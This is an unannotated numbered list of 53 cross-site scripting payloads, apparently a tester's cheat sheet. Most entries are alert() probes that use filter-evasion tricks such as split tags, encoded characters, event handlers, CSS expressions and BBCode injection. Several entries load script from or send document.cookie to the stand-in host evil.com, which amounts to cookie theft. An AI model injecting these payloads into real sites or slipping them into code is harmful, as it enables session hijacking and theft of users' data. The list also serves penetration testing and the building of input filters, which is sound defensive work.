1.<script> alert(1);</script>
2.<script>alert('xss');</script>
3.<script src="http://www.evil.com/cookie.php"></script>
4.<script>location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)"</script>
5.<scr<script>ipt>alert('xss');</scr</script>ipt>
6.<img src=liu.jpg onerror=alert(/xss/)/>
7.<style>@import'javasc ipt:alert("xss")';</style>
8.<?echo('<src)'; echo('ipt>alert("xss")';</script>');?>
9.<marquee><script>alert('xss')</script></marquee>
10.<IMG SRC="jav�x9;ascript:alert('xss');">
11.<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
12."><script>alert(1)</script>
13.<script src=http://www.evil.com/files.js></script>
14.</title><script>alert(/xss/)</script>
15.</textarea><script>alert(/xss)</script>
16.<IMG LOWSRC="javascript:alert('XSS')">
17.<IMG DYNSRC="javascript:alert('XSS')">
18.<font style='color:expression(alert(document.cookie))'>
19.');alert('XSS
20.<img src="javascript:alert('XSS')">
21.[url=javascript:alert('XSS');]click me[/url]
22.<body onunload="javascript:alert('XSS');">
23.<body onLoad="alert('XSS');"
24.[color=red' onmouseover="alert('XSS')"]mouse over[/color]
25."/></a></><img src=1.gif onerror=alert(1)>
26.window.alert("XSS");
27.<div style="x:expression((window==1)?":eval('r=1;alert(String.fromCharCode(83,83,83));'))">
28.<iframe<?php eval chr(11)?>onload=alert('XSS')></iframe>
29."><script alert(String.fromCharCode(88,83,83))</script>
30.'>><marquee><h1>XSS<h1></marquee>
31.'">><script>alert('xss')</script>
32.'">><marquee><h1>XSS</h1></marquee>
33.<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
34.<META HTTP-EQUIV="refresh"CONTENT="0;URL=http://;url=javascript:alert('XSS');">
35.<script>var var=1; alert(var)</script>
36.<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
37.<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
38.<IMG SRC='vbscript:msgbox("XSS")'>
39."onfocus=alert(document.domain)"><"
40.<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
41.<STYLE>li {list-style-image:url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
42.<br size="&{alert('xss')}">
43.<scrscriptipt>alert(1)</scrscriptipt>
44."><BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
45.[color=red width=expression(alert(123))][color]
46.<BASE HREF="javascript:alert('XSS');//">
47.Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))<
48."></iframe><script>alert(123)</script>
49.<body onLoad="while(true) alert('XSS');">
50."<marquee><img src=k.png onerror=alert(/xss/) />
51.<div style="background:url('javascript:')
52.<img src='java script:alert("XSS")'>
53.>'"><img src="javascript:alert('xss')">